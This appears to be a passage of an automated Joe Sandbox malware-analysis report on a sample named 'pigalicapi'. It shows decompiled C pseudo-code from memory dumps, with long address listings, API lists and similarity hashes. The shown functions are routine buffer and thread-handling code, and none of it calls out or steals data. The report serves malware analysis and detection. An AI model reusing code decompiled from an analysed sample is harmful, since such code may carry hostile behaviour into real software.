                                                                                                                                                                                                                                                                                                        								if(_t127 != 0xff) {
                                                                                                                                                                                                                                                                                                        									_t118 = _t127 + 1;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_a16 = _t100;
                                                                                                                                                                                                                                                                                                        									_t108[0x3f] = 0;
                                                                                                                                                                                                                                                                                                        									_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        									_a8 = _t108[0x43];
                                                                                                                                                                                                                                                                                                        									 *_t142 = _t108;
                                                                                                                                                                                                                                                                                                        									_t108[0x42]();
                                                                                                                                                                                                                                                                                                        									_t118 = 1;
                                                                                                                                                                                                                                                                                                        									_t127 = 0;
                                                                                                                                                                                                                                                                                                        									_t108[0x48] = _t108[0x48] + 1;
                                                                                                                                                                                                                                                                                                        									_t100 = _a16;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t136 =  &(_t136[1]);
                                                                                                                                                                                                                                                                                                        								_t108[0x40] = _t118;
                                                                                                                                                                                                                                                                                                        								 *(_t108 + _t127) = _t100;
                                                                                                                                                                                                                                                                                                        								_t108[0x41] = _t100;
                                                                                                                                                                                                                                                                                                        								if(_t136 == 0x41fa5c) {
                                                                                                                                                                                                                                                                                                        									_t132 =  *((intOrPtr*)(_t132 + 4));
                                                                                                                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t127 = _t118;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t138 = _a16;
                                                                                                                                                                                                                                                                                                        						_t103 = _t108[0x40];
                                                                                                                                                                                                                                                                                                        						_t141 = _t126 + _t138;
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							_t120 =  *_t138 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							if(_t103 != 0xff) {
                                                                                                                                                                                                                                                                                                        								_t127 = _t103 + 1;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_a16 = _t120;
                                                                                                                                                                                                                                                                                                        								_t108[0x3f] = 0;
                                                                                                                                                                                                                                                                                                        								_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        								_a8 = _t108[0x43];
                                                                                                                                                                                                                                                                                                        								 *_t142 = _t108;
                                                                                                                                                                                                                                                                                                        								_t108[0x42]();
                                                                                                                                                                                                                                                                                                        								_t127 = 1;
                                                                                                                                                                                                                                                                                                        								_t103 = 0;
                                                                                                                                                                                                                                                                                                        								_t108[0x48] = _t108[0x48] + 1;
                                                                                                                                                                                                                                                                                                        								_t120 = _a16;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t138 =  &(_t138[1]);
                                                                                                                                                                                                                                                                                                        							_t108[0x40] = _t127;
                                                                                                                                                                                                                                                                                                        							 *(_t108 + _t103) = _t120;
                                                                                                                                                                                                                                                                                                        							_t108[0x41] = _t120;
                                                                                                                                                                                                                                                                                                        							if(_t138 == _t141) {
                                                                                                                                                                                                                                                                                                        								goto L29;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t103 = _t127;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					_t87 = E0040B090(_t108, _t132, _a12);
                                                                                                                                                                                                                                                                                                        					return _t87;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}



























                                                                                                                                                                                                                                                                                                        0x004083f4
                                                                                                                                                                                                                                                                                                        0x004083f4
                                                                                                                                                                                                                                                                                                        0x004083ff
                                                                                                                                                                                                                                                                                                        0x00408407
                                                                                                                                                                                                                                                                                                        0x0040840d
                                                                                                                                                                                                                                                                                                        0x004095a3
                                                                                                                                                                                                                                                                                                        0x0040ab2b
                                                                                                                                                                                                                                                                                                        0x0040ab32
                                                                                                                                                                                                                                                                                                        0x0040ab3a
                                                                                                                                                                                                                                                                                                        0x0040ab3d
                                                                                                                                                                                                                                                                                                        0x0040ab41
                                                                                                                                                                                                                                                                                                        0x0040ab47
                                                                                                                                                                                                                                                                                                        0x0040ab4c
                                                                                                                                                                                                                                                                                                        0x0040ab4e
                                                                                                                                                                                                                                                                                                        0x004095a9
                                                                                                                                                                                                                                                                                                        0x004095a9
                                                                                                                                                                                                                                                                                                        0x004095a9
                                                                                                                                                                                                                                                                                                        0x004095ac
                                                                                                                                                                                                                                                                                                        0x004095b2
                                                                                                                                                                                                                                                                                                        0x004095b6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00408413
                                                                                                                                                                                                                                                                                                        0x00408413
                                                                                                                                                                                                                                                                                                        0x00408443
                                                                                                                                                                                                                                                                                                        0x00408448
                                                                                                                                                                                                                                                                                                        0x0040844b
                                                                                                                                                                                                                                                                                                        0x00408420
                                                                                                                                                                                                                                                                                                        0x0040844d
                                                                                                                                                                                                                                                                                                        0x0040844d
                                                                                                                                                                                                                                                                                                        0x00408453
                                                                                                                                                                                                                                                                                                        0x00408457
                                                                                                                                                                                                                                                                                                        0x0040845e
                                                                                                                                                                                                                                                                                                        0x00408466
                                                                                                                                                                                                                                                                                                        0x0040846a
                                                                                                                                                                                                                                                                                                        0x0040846d
                                                                                                                                                                                                                                                                                                        0x00408473
                                                                                                                                                                                                                                                                                                        0x00408478
                                                                                                                                                                                                                                                                                                        0x0040847a
                                                                                                                                                                                                                                                                                                        0x00408481
                                                                                                                                                                                                                                                                                                        0x00408481
                                                                                                                                                                                                                                                                                                        0x00408423
                                                                                                                                                                                                                                                                                                        0x0040842c
                                                                                                                                                                                                                                                                                                        0x00408432
                                                                                                                                                                                                                                                                                                        0x00408435
                                                                                                                                                                                                                                                                                                        0x0040843b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00408441
                                                                                                                                                                                                                                                                                                        0x00408441
                                                                                                                                                                                                                                                                                                        0x004095bd
                                                                                                                                                                                                                                                                                                        0x004095bd
                                                                                                                                                                                                                                                                                                        0x004095c3
                                                                                                                                                                                                                                                                                                        0x0040a2e7
                                                                                                                                                                                                                                                                                                        0x0040a2ed
                                                                                                                                                                                                                                                                                                        0x0040a313
                                                                                                                                                                                                                                                                                                        0x0040a318
                                                                                                                                                                                                                                                                                                        0x0040a31b
                                                                                                                                                                                                                                                                                                        0x0040a2f4
                                                                                                                                                                                                                                                                                                        0x0040a31d
                                                                                                                                                                                                                                                                                                        0x0040a323
                                                                                                                                                                                                                                                                                                        0x0040a327
                                                                                                                                                                                                                                                                                                        0x0040a32e
                                                                                                                                                                                                                                                                                                        0x0040a336
                                                                                                                                                                                                                                                                                                        0x0040a33a
                                                                                                                                                                                                                                                                                                        0x0040a33d
                                                                                                                                                                                                                                                                                                        0x0040a343
                                                                                                                                                                                                                                                                                                        0x0040a348
                                                                                                                                                                                                                                                                                                        0x0040a34a
                                                                                                                                                                                                                                                                                                        0x0040a351
                                                                                                                                                                                                                                                                                                        0x0040a351
                                                                                                                                                                                                                                                                                                        0x0040a2f7
                                                                                                                                                                                                                                                                                                        0x0040a300
                                                                                                                                                                                                                                                                                                        0x0040a306
                                                                                                                                                                                                                                                                                                        0x0040a309
                                                                                                                                                                                                                                                                                                        0x0040a30f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040a311
                                                                                                                                                                                                                                                                                                        0x0040a311
                                                                                                                                                                                                                                                                                                        0x0040a35a
                                                                                                                                                                                                                                                                                                        0x0040a365
                                                                                                                                                                                                                                                                                                        0x0040a369
                                                                                                                                                                                                                                                                                                        0x0040a36f
                                                                                                                                                                                                                                                                                                        0x0040a372
                                                                                                                                                                                                                                                                                                        0x0040a376
                                                                                                                                                                                                                                                                                                        0x0040a37b
                                                                                                                                                                                                                                                                                                        0x0040a37d
                                                                                                                                                                                                                                                                                                        0x0040a37d
                                                                                                                                                                                                                                                                                                        0x0040a37f
                                                                                                                                                                                                                                                                                                        0x0040a38c
                                                                                                                                                                                                                                                                                                        0x0040a38c
                                                                                                                                                                                                                                                                                                        0x0040a39d
                                                                                                                                                                                                                                                                                                        0x0040a3a3
                                                                                                                                                                                                                                                                                                        0x0040a3a6
                                                                                                                                                                                                                                                                                                        0x0040a3a8
                                                                                                                                                                                                                                                                                                        0x0040a3ab
                                                                                                                                                                                                                                                                                                        0x0040a3af
                                                                                                                                                                                                                                                                                                        0x0040a41f
                                                                                                                                                                                                                                                                                                        0x0040a425
                                                                                                                                                                                                                                                                                                        0x0040a425
                                                                                                                                                                                                                                                                                                        0x0040a44f
                                                                                                                                                                                                                                                                                                        0x0040a455
                                                                                                                                                                                                                                                                                                        0x0040a458
                                                                                                                                                                                                                                                                                                        0x0040a430
                                                                                                                                                                                                                                                                                                        0x0040a45a
                                                                                                                                                                                                                                                                                                        0x0040a460
                                                                                                                                                                                                                                                                                                        0x0040a464
                                                                                                                                                                                                                                                                                                        0x0040a46b
                                                                                                                                                                                                                                                                                                        0x0040a473
                                                                                                                                                                                                                                                                                                        0x0040a477
                                                                                                                                                                                                                                                                                                        0x0040a47a
                                                                                                                                                                                                                                                                                                        0x0040a480
                                                                                                                                                                                                                                                                                                        0x0040a485
                                                                                                                                                                                                                                                                                                        0x0040a487
                                                                                                                                                                                                                                                                                                        0x0040a48e
                                                                                                                                                                                                                                                                                                        0x0040a48e
                                                                                                                                                                                                                                                                                                        0x0040a433
                                                                                                                                                                                                                                                                                                        0x0040a43c
                                                                                                                                                                                                                                                                                                        0x0040a442
                                                                                                                                                                                                                                                                                                        0x0040a445
                                                                                                                                                                                                                                                                                                        0x0040a44b
                                                                                                                                                                                                                                                                                                        0x0040a494
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040a494
                                                                                                                                                                                                                                                                                                        0x0040a44d
                                                                                                                                                                                                                                                                                                        0x0040a44d
                                                                                                                                                                                                                                                                                                        0x0040a44f
                                                                                                                                                                                                                                                                                                        0x0040a3b1
                                                                                                                                                                                                                                                                                                        0x0040a3b5
                                                                                                                                                                                                                                                                                                        0x0040a3bb
                                                                                                                                                                                                                                                                                                        0x0040a3db
                                                                                                                                                                                                                                                                                                        0x0040a3e0
                                                                                                                                                                                                                                                                                                        0x0040a3e3
                                                                                                                                                                                                                                                                                                        0x0040a3c0
                                                                                                                                                                                                                                                                                                        0x0040a3e5
                                                                                                                                                                                                                                                                                                        0x0040a3eb
                                                                                                                                                                                                                                                                                                        0x0040a3ef
                                                                                                                                                                                                                                                                                                        0x0040a3f6
                                                                                                                                                                                                                                                                                                        0x0040a3fe
                                                                                                                                                                                                                                                                                                        0x0040a402
                                                                                                                                                                                                                                                                                                        0x0040a405
                                                                                                                                                                                                                                                                                                        0x0040a40b
                                                                                                                                                                                                                                                                                                        0x0040a410
                                                                                                                                                                                                                                                                                                        0x0040a412
                                                                                                                                                                                                                                                                                                        0x0040a419
                                                                                                                                                                                                                                                                                                        0x0040a419
                                                                                                                                                                                                                                                                                                        0x0040a3c3
                                                                                                                                                                                                                                                                                                        0x0040a3c8
                                                                                                                                                                                                                                                                                                        0x0040a3ce
                                                                                                                                                                                                                                                                                                        0x0040a3d1
                                                                                                                                                                                                                                                                                                        0x0040a3d7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040a3d9
                                                                                                                                                                                                                                                                                                        0x0040a3d9
                                                                                                                                                                                                                                                                                                        0x0040a3db
                                                                                                                                                                                                                                                                                                        0x004095c9
                                                                                                                                                                                                                                                                                                        0x004095d1
                                                                                                                                                                                                                                                                                                        0x00407a6f
                                                                                                                                                                                                                                                                                                        0x00407a6f

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: .${default arg#$}::
                                                                                                                                                                                                                                                                                                        • API String ID: 0-723286900
                                                                                                                                                                                                                                                                                                        • Opcode ID: 807978e2fe12c8e62650436d5fac89316e3c74444dbfa66250aab1241fff8e95
                                                                                                                                                                                                                                                                                                        • Instruction ID: 111b32b15ac1d8639141e8955343ba3e421cf829549de16c4b54ac847c584bdd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 807978e2fe12c8e62650436d5fac89316e3c74444dbfa66250aab1241fff8e95
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4714E70508382CBC715CF18C0847A5BBE1AF95304F1889BEECC99F386D7B99889DB56
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: sprintf
                                                                                                                                                                                                                                                                                                        • String ID: this${parm#$}
                                                                                                                                                                                                                                                                                                        • API String ID: 590974362-3278767634
                                                                                                                                                                                                                                                                                                        • Opcode ID: 30e33bfbb701848d574accebed10949c52124b3b754f770995b392d252369856
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6ca329e72789fd266b2bb598c5e7687cf637df336f52b9e7cc6e2d8447b8da5e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30e33bfbb701848d574accebed10949c52124b3b754f770995b392d252369856
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC514A7050C2418BCB15CF28C0847A67BE1AF94310F0889BEECCD9F387D7B998859B96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 33%
                                                                                                                                                                                                                                                                                                        			E00412D80(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                                                                        				char* _v72;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t66;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t68;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t57 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t63 = _a4;
                                                                                                                                                                                                                                                                                                        				 *_t66 = _t63;
                                                                                                                                                                                                                                                                                                        				_t33 = E004107C0(__edx);
                                                                                                                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                                                                                                                        				_v36 = 0xfeedbab1;
                                                                                                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                                                                                                        				_v32 = 1;
                                                                                                                                                                                                                                                                                                        				_t56 = _t33;
                                                                                                                                                                                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                                                                                                                        					_t64 = 3;
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t64;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t35 =  *((intOrPtr*)(_t33 + 0x14));
                                                                                                                                                                                                                                                                                                        				if(_t35 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v72 =  &_v48;
                                                                                                                                                                                                                                                                                                        				 *_t66 = _t35;
                                                                                                                                                                                                                                                                                                        				_t36 = GetHandleInformation(??, ??);
                                                                                                                                                                                                                                                                                                        				_t67 = _t66 - 8;
                                                                                                                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                                                                                                                        					_t64 = 0x16;
                                                                                                                                                                                                                                                                                                        					if(( *(_t56 + 0x24) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                                        						_t37 = E004102F0(_t56, _t57,  &_v48, _t63, 0x16);
                                                                                                                                                                                                                                                                                                        						if(_t37 == 0) {
                                                                                                                                                                                                                                                                                                        							_t38 = 0;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t38 =  *((intOrPtr*)(_t37 + 0xbc));
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t64 = 0x24;
                                                                                                                                                                                                                                                                                                        						if(_t63 != _t38) {
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							if( *((intOrPtr*)(_t56 + 0x70)) == 0) {
                                                                                                                                                                                                                                                                                                        								_v72 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        								 *_t67 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                                                        								WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        								_t67 = _t67 - 8;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t67 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                                                        							CloseHandle(??);
                                                                                                                                                                                                                                                                                                        							_t44 =  *((intOrPtr*)(_t56 + 0x18));
                                                                                                                                                                                                                                                                                                        							_t68 = _t67 - 4;
                                                                                                                                                                                                                                                                                                        							if(_t44 != 0) {
                                                                                                                                                                                                                                                                                                        								 *_t68 = _t44;
                                                                                                                                                                                                                                                                                                        								CloseHandle(??);
                                                                                                                                                                                                                                                                                                        								_t68 = _t68 - 4;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x18)) = 0;
                                                                                                                                                                                                                                                                                                        							if(_a8 != 0) {
                                                                                                                                                                                                                                                                                                        								 *_a8 =  *((intOrPtr*)(_t56 + 4));
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t64 = 0;
                                                                                                                                                                                                                                                                                                        							 *_t68 = _t56 + 0x1c;
                                                                                                                                                                                                                                                                                                        							E004140E0();
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x34)) = _v44;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x38)) = _v40;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x3c)) = _v36;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x40)) = _v32;
                                                                                                                                                                                                                                                                                                        							if( *((intOrPtr*)(_t56 + 0xb8)) == 0) {
                                                                                                                                                                                                                                                                                                        								E0040FD20(_t56);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                                                                                                                        			}


























                                                                                                                                                                                                                                                                                                        0x00412d80
                                                                                                                                                                                                                                                                                                        0x00412d89
                                                                                                                                                                                                                                                                                                        0x00412d8c
                                                                                                                                                                                                                                                                                                        0x00412d8f
                                                                                                                                                                                                                                                                                                        0x00412d94
                                                                                                                                                                                                                                                                                                        0x00412d9b
                                                                                                                                                                                                                                                                                                        0x00412da2
                                                                                                                                                                                                                                                                                                        0x00412da9
                                                                                                                                                                                                                                                                                                        0x00412db2
                                                                                                                                                                                                                                                                                                        0x00412db4
                                                                                                                                                                                                                                                                                                        0x00412dd4
                                                                                                                                                                                                                                                                                                        0x00412dd4
                                                                                                                                                                                                                                                                                                        0x00412dd9
                                                                                                                                                                                                                                                                                                        0x00412de2
                                                                                                                                                                                                                                                                                                        0x00412de2
                                                                                                                                                                                                                                                                                                        0x00412db6
                                                                                                                                                                                                                                                                                                        0x00412dbb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412dc0
                                                                                                                                                                                                                                                                                                        0x00412dc4
                                                                                                                                                                                                                                                                                                        0x00412dc7
                                                                                                                                                                                                                                                                                                        0x00412dcd
                                                                                                                                                                                                                                                                                                        0x00412dd2
                                                                                                                                                                                                                                                                                                        0x00412de7
                                                                                                                                                                                                                                                                                                        0x00412dec
                                                                                                                                                                                                                                                                                                        0x00412dee
                                                                                                                                                                                                                                                                                                        0x00412df5
                                                                                                                                                                                                                                                                                                        0x00412e8b
                                                                                                                                                                                                                                                                                                        0x00412dfb
                                                                                                                                                                                                                                                                                                        0x00412dfb
                                                                                                                                                                                                                                                                                                        0x00412dfb
                                                                                                                                                                                                                                                                                                        0x00412e03
                                                                                                                                                                                                                                                                                                        0x00412e08
                                                                                                                                                                                                                                                                                                        0x00412e0a
                                                                                                                                                                                                                                                                                                        0x00412e14
                                                                                                                                                                                                                                                                                                        0x00412e95
                                                                                                                                                                                                                                                                                                        0x00412ea0
                                                                                                                                                                                                                                                                                                        0x00412ea3
                                                                                                                                                                                                                                                                                                        0x00412ea9
                                                                                                                                                                                                                                                                                                        0x00412ea9
                                                                                                                                                                                                                                                                                                        0x00412e1f
                                                                                                                                                                                                                                                                                                        0x00412e22
                                                                                                                                                                                                                                                                                                        0x00412e24
                                                                                                                                                                                                                                                                                                        0x00412e27
                                                                                                                                                                                                                                                                                                        0x00412e2c
                                                                                                                                                                                                                                                                                                        0x00412e2e
                                                                                                                                                                                                                                                                                                        0x00412e31
                                                                                                                                                                                                                                                                                                        0x00412e33
                                                                                                                                                                                                                                                                                                        0x00412e33
                                                                                                                                                                                                                                                                                                        0x00412e39
                                                                                                                                                                                                                                                                                                        0x00412e42
                                                                                                                                                                                                                                                                                                        0x00412e4a
                                                                                                                                                                                                                                                                                                        0x00412e4a
                                                                                                                                                                                                                                                                                                        0x00412e4f
                                                                                                                                                                                                                                                                                                        0x00412e51
                                                                                                                                                                                                                                                                                                        0x00412e54
                                                                                                                                                                                                                                                                                                        0x00412e5c
                                                                                                                                                                                                                                                                                                        0x00412e62
                                                                                                                                                                                                                                                                                                        0x00412e68
                                                                                                                                                                                                                                                                                                        0x00412e6e
                                                                                                                                                                                                                                                                                                        0x00412e79
                                                                                                                                                                                                                                                                                                        0x00412e81
                                                                                                                                                                                                                                                                                                        0x00412e81
                                                                                                                                                                                                                                                                                                        0x00412e79
                                                                                                                                                                                                                                                                                                        0x00412e08
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412dec
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Handle$Close$InformationObjectSingleWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 135186658-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e5a4b129ae92d8d88fee5e4004c5104fc19af652de718fde7cfc4be735879905
                                                                                                                                                                                                                                                                                                        • Instruction ID: eefc78a76a067577111aecbaeb0e7de47b452a34a27c7b211ac7547dace962ae
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5a4b129ae92d8d88fee5e4004c5104fc19af652de718fde7cfc4be735879905
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8312A74A003088BDB50EF69D6847DABBF4EF08310F04856AEC45EB345E779E895CB99
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,?,?,FFFFFFFF,?,0040FB75), ref: 00413A4C
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413A77
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413AA4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
